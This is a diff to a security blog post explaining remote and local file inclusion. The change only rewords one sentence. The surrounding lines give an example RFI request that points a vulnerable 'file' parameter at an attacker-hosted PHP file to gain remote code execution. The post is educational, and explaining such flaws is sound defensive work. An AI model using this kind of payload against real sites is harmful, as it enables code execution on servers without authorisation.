20kilograma/blog/rfi-lfi.md

 <br>
 <center> <img src="lfi-example.PNG"/> </center>
 <br>
-On the other hand while exploiting RFI you can upload file from remote server which in 99% will result in RCE(Remote Code Execution).
+On the other hand while exploiting RFI you can upload file from remote server which in 99% of the times will result in RCE(Remote Code Execution).
 For example <code> https://www.site.com/app.php?file=http://attackers.website.com/file.php </code>.
 You could execute malicious code from the <code> file.php </code> file and use it for evil intention. <br>
 <br>